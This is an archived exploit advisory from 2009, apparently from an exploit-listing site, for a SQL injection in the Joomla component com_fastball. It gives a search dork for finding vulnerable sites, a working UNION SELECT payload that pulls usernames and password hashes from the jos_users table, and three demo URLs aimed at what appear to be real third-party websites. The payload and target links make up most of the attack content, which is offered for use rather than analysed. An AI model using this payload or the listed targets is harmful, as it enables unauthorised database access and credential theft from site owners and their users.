|    |    |    | Today: 18-Nov-2019 |

Joomla Component com_fastball Remote SQL injection vulnerability

September 29, 2009 | Posted in ExploitAlert


#############################################################################################################
## Joomla Component com_fastball Remote SQL injection vulnerability - (league) ##
## Author : kaMtiEz (kamzcrew@gmail.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 23, 2009 ##
#############################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32
[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_fastball"
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

[ Demo ]

http://diamondblacks.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://sandiegoturbos.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha

Taged in: component, fastball, injection, Joomla, Remote, vulnerability